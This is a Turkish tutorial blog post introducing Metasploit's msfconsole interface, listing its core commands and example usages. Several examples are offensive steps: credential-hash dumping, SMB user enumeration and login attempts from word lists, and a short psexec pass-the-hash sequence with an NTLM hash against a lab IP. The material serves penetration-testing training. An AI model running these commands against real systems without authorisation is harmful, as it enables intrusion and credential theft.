Metasploit Anaçatısı: MSFCONSOLE Arayüzü

Metasploit anaçatısı bir çok birleşenden oluşmuştur. Bu yazıda Metasploit Framework içerisinde en çok desktek gören ve tercih edilen arayüz olan “msfconsole” incelenecektir.

Metasploit Framework, Kali Linux üzerinde “/usr/share/metasploit-framework” altında toplanmıştır.

metasploit-fundamentals-msfconsole-command-line-interface-01

 

Kullanım Amaçları

MsfConsole, Metasploit Framework içerisinde en çok destek gören ve tercih edilen arayüzdür. Bunun başlıca sebepleri şu şekildedir:

  • Kullanıcı dostudur. Ruby sayesinde Tab tuşu ile tamamlama gibi kullanımı kolaylaştırıcı özelliklere sahiptir.
  • En sağlam (stable) konsol tabanlı arayüzdür.
  • Merkezi bir arayüz sunar.
  • Metasploit ana çatısının her özelliğine (feature) neredeyse tamamına erişim sağlayabilen tek MSF arayüzüdür.
  • Metasploit anaçatısındaki özelliklerin yanı sıra, Linux taraflı dış komutlara (ifconfig, ping,… gibi) da erişim sağlanabilir.
  • Yardımcı dokümanları en iyi hazırlanmış arayüzdür.
  • Bu arayüzün kullanımı için “/usr/share/metasploit-framework” dizini altındaki msfconsole aracı kullanılır. Eğer çevresel değişkenler uygun şekilde yapılandırılmışsa, Kali’de yapılandırılmıştır, herhangi bir dizinde bu komut çalıştırılabilir.

 

Önemli Komutları

MsfConsole arayüzünde kullanılabilecek önemli komutlar aşağıdaki gibi listelenebilir:

  • help veya ? veya <Komut> -h: Yardımcı dokümantasyon sunar.
  • info <ModulAdi>: Seçilen modülü veya modüller ile ilgili ön bilgi (Modül adı, versiyonu, çalışacağı platformlar, lisansı, yazarları, tanımı, seçenekleri, referansları, beklenmedik etkileri vs) sunar.
  • back: Mevcut modülden geri çıkmak için kullanılır.
  • check: Exploit işlemini gerçekleştirmeden önce yapılan kontroldür. Böylece exploit işleminin başarılı olup olunmayacağı kontrol edilir. Çok az sayıda exploit tarafından bu komut desteklenir.
  • connect <Senecekler>: Telnet veya netcat araçları gibi, bir sistemin bir portuna bağlantı (connect <IP> <Port>) için kullanılır.
  • exit: msfconsole komut satırından çıkılması için kullanılır.
  • irb: msf konsolundan, etkileşimli Ruby kabuğuna geçiş için kullanılır.
  • jobs <Secenekler>: Arka planda çalışan modülleri sunar, sonlandırır ve yönetir.
  • kill <JobId>: Belirtilen arka plandaki işlemi (job) sonlandırır.
  • load <EklentiAdi>: Kişisel (“/root/.msf4/plugins”) ve Metasploit anaçatısındaki eklentileri (“/usr/share/metasploit-framework/plugins”) yükler.
  • resource <KaynakDosyasi>: msfconsole tarafından yüklenebilecek betik (kaynak) dosyalarını çalıştırır.
  • route: Oturum açıldıktan sonra ağlar arasında oturumlar üzerinden geçmek için kullanılır. Ayrıntılı bilgi Pivoting başlığı altında incelenecektir.
  • search <ModulBilgisininBirKismi>: Adı, tanımı, referansı gibi bilgisinin belli bir kısmı bilinen modül için arama gerçekleştirilir. Modüller isimlendirilirken “-” yerine “_” kullanıldığından, “_” ile arama yapılması daha doğru sonuçlar verir.
  • sessions: Mevcut oturumları (meterpreter oturumu, shell, VNC) listeler ve yönetir.
  • set <Secenek> <Deger>: Mevcut modül için belirtilen seçeneğe, belirtilen değeri atar.
  • setg <Secenek> <Deger>: Tüm modüller için (global olarak) belirtilen seçeneğe, belirtilen değeri atar.
  • save: setg komutu ile yapılan değişiklikleri ayar dosyasına (/root/.msf4/config) kaydeder. Böylece bu ayarlar her zaman kullanılabilir.
  • show <Parametre>: Belirtilen parametreye (all, encoders, nops, exploits, payloads, auxiliary, plugins, options) uygun seçenekleri sunar.
  • unload <EklentiAdi>: Yüklü eklentiyi kaldırır.
  • unset <Parametre>: Değer verilmiş seçeneklerdeki değeri kaldırır.
  • unsetg <Parametre>: Değer verilmiş genel seçeneklerdeki değeri kaldırır.
  • use <ModulAdi>: Belirtilen modül kullanılır.
  • run veya exploit: Modülleri çalıştırmak için kullanılır. Auxiliary modüller için “run”, istismar modülleri için “exploit” kullanılır.

metasploit-fundamentals-msfconsole-command-line-interface-02

 

Örnek Kullanımlar

MsfConsole arayüzü ile çalıştırılabilecek bazı örnek komutlar aşağıdaki gibi listelenebilir.

  • msf > help
  • msf > sessions -h
  • msf > search smart_hash
  • msf > search type:post platform:linux path:gather name:virtual author:Carlos
  • msf > use post/windows/gather/smart_hashdump
  • msf > sessions -l
  • msf > sessions -i 4 -c “net localgroup”
  • msf > sessions -k 2
  • msf exploit(psexec) > set RHOST 192.168.5.74
  • msf auxiliary(smb_enumusers_domain)> setg RHOSTS file:/root/Desktop/ipListesi
  • msf auxiliary(smb_login)> setg USER_FILE /root/Desktop/kullaniciListesi
  • msf > unset PAYLOAD
  • msf > unset all
  • msf > save
  • msf exploit(ms08_067_netapi) > show payloads
  • msf > show options

Modülün seçilmesi aşağıdaki gibidir:

search psexec
use exploit/windows/smb/psexec

metasploit-fundamentals-msfconsole-command-line-interface-03

Modülün genel seçeneklerinin listelenmesi aşağıdaki gibidir:

show options

metasploit-fundamentals-msfconsole-command-line-interface-04

Modülün seçeneklerinin ayarlanması ve modülün kullanılması aşağıdaki gibidir:

set RHOST 10.60.9.104
set SMBUSER Kerem
set SMBPASS aad3b435b51404eeaad3b435b51404ee:8cfbcf5888624ea67544d80484068c6e
exploit
getuid

metasploit-fundamentals-msfconsole-command-line-interface-05

 

Yazarın Bilgileri

Ertuğrul BAŞARANOĞLU
Ertuğrul BAŞARANOĞLU

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.